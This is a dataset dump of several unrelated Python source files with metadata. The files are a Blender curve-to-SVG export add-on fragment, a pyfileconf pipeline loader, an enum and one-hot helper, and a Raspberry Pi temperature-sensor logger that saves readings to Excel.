bpy.types.Scene.export_svg_scale = bpy.props.IntProperty( name="Scale", description="How many pixels one blender unit represents", default=10, min=1) bpy.types.Scene.export_svg_precision = bpy.props.IntProperty( name="Precision", description="Precision of floating point Vectors", default=4, min=0, max=21) bpy.utils.register_class(DATA_OT_CurveExportSVG) bpy.utils.register_class(CurveExportSVGPanel) def unregister(): """Unregisters curve_to_svg Add-on""" bpy.utils.unregister_class(CurveExportSVGPanel) bpy.utils.unregister_class(DATA_OT_CurveExportSVG) del bpy.types.Scene.export_svg_output del bpy.types.Scene.export_svg_minify del bpy.types.Scene.export_svg_scale del bpy.types.Scene.export_svg_precision if __name__ == '__main__': register()
en
0.721666
Returns SVG transform for object Converts linear channel to sRGB and then to hexadecimal # Author: @brecht # Link: https://devtalk.blender.org/t/get-hex-gamma-corrected-color/2422/2 Converts a Color object to hexadecimal Returns a pretty-printed XML string for the Element Creates a Panel in the data context of the properties editor Draws the Export SVG Panel Checks if the Export SVG Panel should appear Generates a SVG file from selected 2D Curves # guide https://css-tricks.com/svg-path-syntax-illustrated-guide/ # will be used: M L C S Z #'lineto_h': "H {x}", #'lineto_v': "V {y}", # h = handle_point # mirror handle from previous C or S #'curveto_q': "Q {hx},{hy} {x},{y}", # both handles in same position #'curveto_qs': "T {x},{y}", # mirror handle from previous Q or T #'arc': "A {rx},{ry} {rot} {arc} {sweep} {x},{y}", # arc, sweep -> 0 or 1. it's to choose between four possibilities of arc #handle_type = {'AUTO', 'ALIGNED', 'VECTOR', 'FREE'} Exports selected 2D Curves to SVG file # the Y axis is inverted # TODO: search if is there a better approach Converts a Curve object to SVG elements Converts a Curve Spline to 'd' attribute for path element # TODO: fix when points are in inverted order # problem: some paths do union instead of difference Adds the path's next command, returns previous handler point # TODO: type will be used to choose between L C S commands # C can do all the job, but using the others can reduce the svg # first command is moveto first point, then curveto others points Updates viewBox coords to fit an object Registers curve_to_svg Add-on Unregisters curve_to_svg Add-on
2.630674
3
pyfileconf/io/file/load/lazy/pipeline.py
nickderobertis/py-file-conf
2
6629048
from pyfileconf.io.file.load.lazy.pipelineast import PipelineAstLoader from pyfileconf.io.file.load.parsers.collections import extract_collection_from_ast class PipelineDictLoader(PipelineAstLoader): def load(self): # Get pipeline_dict_ast super().load() # Convert ast dicts and ast lists to normal dicts and lists, store as self.pipeline_dict self._pipeline_dict_assign_to_dict() return self.pipeline_dict @property def pipeline_dict(self): return self._try_getattr_else_load('_pipeline_dict') def _pipeline_dict_assign_to_dict(self): """ Iterates through ast tree of pipeline dict, producing a dict/list structure, while leaving other objects as ast representations Returns: """ if self.pipeline_dict_assign is not None: self._pipeline_dict = extract_collection_from_ast(self.pipeline_dict_assign.to_ast()) else: self._pipeline_dict = {}
from pyfileconf.io.file.load.lazy.pipelineast import PipelineAstLoader from pyfileconf.io.file.load.parsers.collections import extract_collection_from_ast class PipelineDictLoader(PipelineAstLoader): def load(self): # Get pipeline_dict_ast super().load() # Convert ast dicts and ast lists to normal dicts and lists, store as self.pipeline_dict self._pipeline_dict_assign_to_dict() return self.pipeline_dict @property def pipeline_dict(self): return self._try_getattr_else_load('_pipeline_dict') def _pipeline_dict_assign_to_dict(self): """ Iterates through ast tree of pipeline dict, producing a dict/list structure, while leaving other objects as ast representations Returns: """ if self.pipeline_dict_assign is not None: self._pipeline_dict = extract_collection_from_ast(self.pipeline_dict_assign.to_ast()) else: self._pipeline_dict = {}
en
0.909322
# Get pipeline_dict_ast # Convert ast dicts and ast lists to normal dicts and lists, store as self.pipeline_dict Iterates through ast tree of pipeline dict, producing a dict/list structure, while leaving other objects as ast representations Returns:
2.786314
3
Utilities/MessageUtilities/SwarmAnalyticsUtility/MessageInterface/Enums/ChatNumber.py
IshmaGurca/SwarmAnalytics
0
6629049
from enum import Enum import numpy as np class ChatNumberEnum(Enum): CHATNR0 = 0 CHATNR1 = 1 #CHATNR2 = 2 #CHATNR3 = 3 #CHATNR4 = 4 #CHATNR5 = 5 class ChatNumber: def __init__(self): self.Enum = ChatNumberEnum self.n = len(self.Enum) def IndexToOneHot(self, indices): import tensorflow as tf return tf.one_hot(indices,self.n) def OneHotToIndex(self,onehots): import tensorflow as tf return tf.argmax(onehots,axis = 1) def IndexToEnum(self,indices): return [self.Enum(i) for i in indices] def EnumToIndex(self, enums): return np.asarray([e.value for e in enums]) def EnumToOneHot(self,enums): indices = self.EnumToIndex(enums) return self.IndexToOneHot(indices) def OneHotToEnum(self, onehots): indices = self.OneHotToIndex(onehots) return self.IndexToEnum(indices) def GetEnumByIndex(self,index): return self.Enum(index) if __name__ == "__main__": x = ChatNumberEnum() print(x.Enum.ANSWER) print(x.Enum(0)) print('Hello')
from enum import Enum import numpy as np class ChatNumberEnum(Enum): CHATNR0 = 0 CHATNR1 = 1 #CHATNR2 = 2 #CHATNR3 = 3 #CHATNR4 = 4 #CHATNR5 = 5 class ChatNumber: def __init__(self): self.Enum = ChatNumberEnum self.n = len(self.Enum) def IndexToOneHot(self, indices): import tensorflow as tf return tf.one_hot(indices,self.n) def OneHotToIndex(self,onehots): import tensorflow as tf return tf.argmax(onehots,axis = 1) def IndexToEnum(self,indices): return [self.Enum(i) for i in indices] def EnumToIndex(self, enums): return np.asarray([e.value for e in enums]) def EnumToOneHot(self,enums): indices = self.EnumToIndex(enums) return self.IndexToOneHot(indices) def OneHotToEnum(self, onehots): indices = self.OneHotToIndex(onehots) return self.IndexToEnum(indices) def GetEnumByIndex(self,index): return self.Enum(index) if __name__ == "__main__": x = ChatNumberEnum() print(x.Enum.ANSWER) print(x.Enum(0)) print('Hello')
en
0.891665
#CHATNR2 = 2 #CHATNR3 = 3 #CHATNR4 = 4 #CHATNR5 = 5
2.922037
3
temp_log.py
millerii/rpi-temp-logger
0
6629050
<gh_stars>0 #!/usr/bin/env python3 # DS1820 and DS18S20 have the Family Code 10 # DS18B20 has Code 28 # DS1822 the 22. # Don't know will this work with 'B' or x22 -sensors import os import sys import openpyxl import datetime # Remove first comma from path if using with real sensors dir_w1_bus = "./sys/bus/w1/devices/" def scan_sensors(): temp_sensors = [] try: temp_sensors = os.listdir(dir_w1_bus) except Exception as e: print("*** Temperature sensor not found, check sensor connection or One-Wire settings. ***") raise SystemExit(e) else: # Pick only valid sensor-folders, folder starts with correct family code temp_sensors = [i for i in temp_sensors if i.startswith("10-")] if temp_sensors == []: raise FileNotFoundError return temp_sensors # List of temp-sensors id's def read_sensors(temp_sensors): # Take list of temp-sensors id's as argument temperatures = {} for sensor in temp_sensors: try_count = 0 check_crc = "NO" temp = "" try: with open(dir_w1_bus + sensor + "/w1_slave", "r") as file: while check_crc == "NO" and try_count <= 2: temp = file.read() # Parse crc-check, last word in line (YES/NO) check_crc = temp.split("\n")[0].rsplit(" ",1)[-1] try_count += 1 except Exception as e: print(e) if check_crc == "YES": # Parse temperature, last word in line followed by 't=' temp = temp.split("\n")[1].rsplit('t=',1)[-1] temp = float(temp) / 1000 # Save sensor-id and temp to dictionary key = sensor value = round(temp, 1) temperatures[key] = value else: temp = "" return temperatures # Dictionary of sensor-id combined with temperature def show_temp(): temps = read_sensors(scan_sensors()) for addres, temp in temps.items(): print(addres + ":", str(temp) + "\N{DEGREE SIGN}C") def excel_save(): def add_temp_excel(ws_data, column_for_id, last_row, temp_for_id): ws_data["A" + last_row] = date_now ws_data["A" + last_row].number_format = 'dd.mm.yyyy h:mm' ws_data[column_for_id + last_row] = temp_for_id date_now = datetime.datetime.now() temps = read_sensors(scan_sensors()) # Create initial excel file, if not exist excel_file = "temp_history.xlsx" if not os.path.isfile(excel_file): wb = openpyxl.Workbook() # One time excel-file initializing ws_data = wb.active ws_data.title = "data" ws_data['A1'] = "Date-Time" try: wb.save(excel_file) except Exception as e: print(e) # Load excel-workbook and save new data try: wb = openpyxl.load_workbook(excel_file) except Exception as e: print(e) else: ws_data = wb["data"] # Read excel headers for sensor-id -name compare row_headers = [] for col in ws_data['1']: row_headers.append(col.value) last_row = str(ws_data.max_row + 1) # Find last row from data-worksheet for id in temps: if id in row_headers: column_for_id = str(chr(row_headers.index(id) + 97)) # Convert row 'number' [row_headers.index(id)] to letter [id:0 + ascii:97 = A] # Add new temp for sensor-id row add_temp_excel(ws_data, column_for_id, last_row, temps[id]) else: # Add new sensor-id and save temp for that row column_for_id = chr(ws_data.max_column + 97) # Get last row [id:0 + ascii:97 = A] ws_data[column_for_id + str(1)] = id add_temp_excel(ws_data, column_for_id, last_row, temps[id]) try: wb.save(excel_file) except Exception as e: print(e) launch_argv = [] launch_argv = sys.argv if "-show" in launch_argv: show_temp() sys.exit() excel_save()
#!/usr/bin/env python3 # DS1820 and DS18S20 have the Family Code 10 # DS18B20 has Code 28 # DS1822 the 22. # Don't know will this work with 'B' or x22 -sensors import os import sys import openpyxl import datetime # Remove first comma from path if using with real sensors dir_w1_bus = "./sys/bus/w1/devices/" def scan_sensors(): temp_sensors = [] try: temp_sensors = os.listdir(dir_w1_bus) except Exception as e: print("*** Temperature sensor not found, check sensor connection or One-Wire settings. ***") raise SystemExit(e) else: # Pick only valid sensor-folders, folder starts with correct family code temp_sensors = [i for i in temp_sensors if i.startswith("10-")] if temp_sensors == []: raise FileNotFoundError return temp_sensors # List of temp-sensors id's def read_sensors(temp_sensors): # Take list of temp-sensors id's as argument temperatures = {} for sensor in temp_sensors: try_count = 0 check_crc = "NO" temp = "" try: with open(dir_w1_bus + sensor + "/w1_slave", "r") as file: while check_crc == "NO" and try_count <= 2: temp = file.read() # Parse crc-check, last word in line (YES/NO) check_crc = temp.split("\n")[0].rsplit(" ",1)[-1] try_count += 1 except Exception as e: print(e) if check_crc == "YES": # Parse temperature, last word in line followed by 't=' temp = temp.split("\n")[1].rsplit('t=',1)[-1] temp = float(temp) / 1000 # Save sensor-id and temp to dictionary key = sensor value = round(temp, 1) temperatures[key] = value else: temp = "" return temperatures # Dictionary of sensor-id combined with temperature def show_temp(): temps = read_sensors(scan_sensors()) for addres, temp in temps.items(): print(addres + ":", str(temp) + "\N{DEGREE SIGN}C") def excel_save(): def add_temp_excel(ws_data, column_for_id, last_row, temp_for_id): ws_data["A" + last_row] = date_now ws_data["A" + last_row].number_format = 'dd.mm.yyyy h:mm' ws_data[column_for_id + last_row] = temp_for_id date_now = datetime.datetime.now() temps = read_sensors(scan_sensors()) # Create initial excel file, if not exist excel_file = "temp_history.xlsx" if not os.path.isfile(excel_file): wb = openpyxl.Workbook() # One time excel-file initializing ws_data = wb.active ws_data.title = "data" ws_data['A1'] = "Date-Time" try: wb.save(excel_file) except Exception as e: print(e) # Load excel-workbook and save new data try: wb = openpyxl.load_workbook(excel_file) except Exception as e: print(e) else: ws_data = wb["data"] # Read excel headers for sensor-id -name compare row_headers = [] for col in ws_data['1']: row_headers.append(col.value) last_row = str(ws_data.max_row + 1) # Find last row from data-worksheet for id in temps: if id in row_headers: column_for_id = str(chr(row_headers.index(id) + 97)) # Convert row 'number' [row_headers.index(id)] to letter [id:0 + ascii:97 = A] # Add new temp for sensor-id row add_temp_excel(ws_data, column_for_id, last_row, temps[id]) else: # Add new sensor-id and save temp for that row column_for_id = chr(ws_data.max_column + 97) # Get last row [id:0 + ascii:97 = A] ws_data[column_for_id + str(1)] = id add_temp_excel(ws_data, column_for_id, last_row, temps[id]) try: wb.save(excel_file) except Exception as e: print(e) launch_argv = [] launch_argv = sys.argv if "-show" in launch_argv: show_temp() sys.exit() excel_save()
en
0.648982
#!/usr/bin/env python3 # DS1820 and DS18S20 have the Family Code 10 # DS18B20 has Code 28 # DS1822 the 22. # Don't know will this work with 'B' or x22 -sensors # Remove first comma from path if using with real sensors # Pick only valid sensor-folders, folder starts with correct family code # List of temp-sensors id's # Take list of temp-sensors id's as argument # Parse crc-check, last word in line (YES/NO) # Parse temperature, last word in line followed by 't=' # Save sensor-id and temp to dictionary # Dictionary of sensor-id combined with temperature # Create initial excel file, if not exist # One time excel-file initializing # Load excel-workbook and save new data # Read excel headers for sensor-id -name compare # Find last row from data-worksheet # Convert row 'number' [row_headers.index(id)] to letter [id:0 + ascii:97 = A] # Add new temp for sensor-id row # Add new sensor-id and save temp for that row # Get last row [id:0 + ascii:97 = A]
2.690725
3